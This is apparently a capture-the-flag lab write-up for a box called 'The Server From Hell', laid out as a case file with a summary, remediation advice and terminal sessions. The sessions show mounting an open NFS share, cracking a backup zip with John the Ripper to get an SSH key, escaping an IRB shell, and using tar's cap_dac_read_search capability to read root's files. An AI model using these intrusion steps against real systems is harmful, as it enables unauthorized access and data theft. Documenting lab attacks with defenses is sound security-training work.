NFS zip crack, nonstandard SSH, and tar capability read
Intermediate network engagement: banner and NFS hints led to a crackable backup zip with hades’ SSH key; SSH on 3333 landed in IRB then bash; tar with cap_dac_read_search archived root’s artifact.
- Case files
- NFS zip crack, nonstandard SSH, and tar capability read
Port 1337 and NFS messaging pointed at a world-exported share. A weak zip held an SSH key for hades on port 3333. File capability on tar read /root without a traditional SUID shell.
Mounted the NFS share, cracked backup.zip, and recovered hades’ private key plus the SSH port range hint.
nmap found OpenSSH on 3333. Key auth as hades landed in IRB; exec restored bash.
tar with DAC-read capability archived /root/root.txt and extracted it as hades.
Engagement summary
Port 1337 and NFS messaging pointed at a world-exported share. A weak zip held an SSH key for hades on port 3333. File capability on tar read /root without a traditional SUID shell.
THE SERVER FROM HELL opened with a banner on 1337 and noisy low ports. Port 12345 hinted that NFS was on the standard port; showmount/mount of the export yielded backup.zip. zip2john and rockyou recovered the archive password; inside were flag material, a port hint (2500–4500), and hades’ id_rsa. SSH listened on 3333 (not 22) and dropped into IRB; exec '/bin/bash' restored a normal shell. getcap showed /bin/tar = cap_dac_read_search+ep — enough to archive and extract /root/root.txt without needing a root shell process.
Business impact
World-readable NFS backups with weak zip encryption are credential dumps. Nonstandard SSH ports are not secrecy. Capabilities that bypass DAC on archival tools equal data exfiltration as root. Restrict NFS exports, use strong archive encryption, and strip unnecessary capabilities from tar.
NFS export and zip crack
Mounted the NFS share, cracked backup.zip, and recovered hades’ private key plus the SSH port range hint.
OPERATOR · NFS
savvy@lab:~$ nc 10.10.99.10 1337
savvy@lab:~$ nc 10.10.99.10 12345
NFS shares are cool... standard port
savvy@lab:~$ sudo mount -t nfs 10.10.99.10:/ /mnt/nfs
savvy@lab:~$ zip2john /mnt/nfs/backup.zip > backup.hash
savvy@lab:~$ john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt
zxcvbnm (backup.zip)
hint.txt → SSH between 2500-4500; id_rsa for hades
SSH on 3333 and IRB escape
nmap found OpenSSH on 3333. Key auth as hades landed in IRB; exec restored bash.
OPERATOR · SSH
savvy@lab:~$ nmap -sV -p 2500-4500 10.10.99.10
3333/tcp open ssh OpenSSH
savvy@lab:~$ chmod 600 id_rsa && ssh -i id_rsa hades@10.10.99.10 -p 3333
irb(main):001:0>
>> exec '/bin/bash'
savvy@lab:~$
tar cap_dac_read_search exfil
tar with DAC-read capability archived /root/root.txt and extracted it as hades.
OPERATOR · CAPABILITY
savvy@lab:~$ getcap -r / 2>/dev/null
/bin/tar = cap_dac_read_search+ep
savvy@lab:~$ tar -cvf flag.tar /root/root.txt
savvy@lab:~$ tar xf flag.tar && cat root/root.txt
root artifact recovered
Remediation
Export NFS only to trusted hosts with root_squash. Encrypt backups with unique strong passwords. Prefer key-only SSH on standard ports behind proper ACLs. Remove cap_dac_read_search from tar unless a documented, monitored need exists.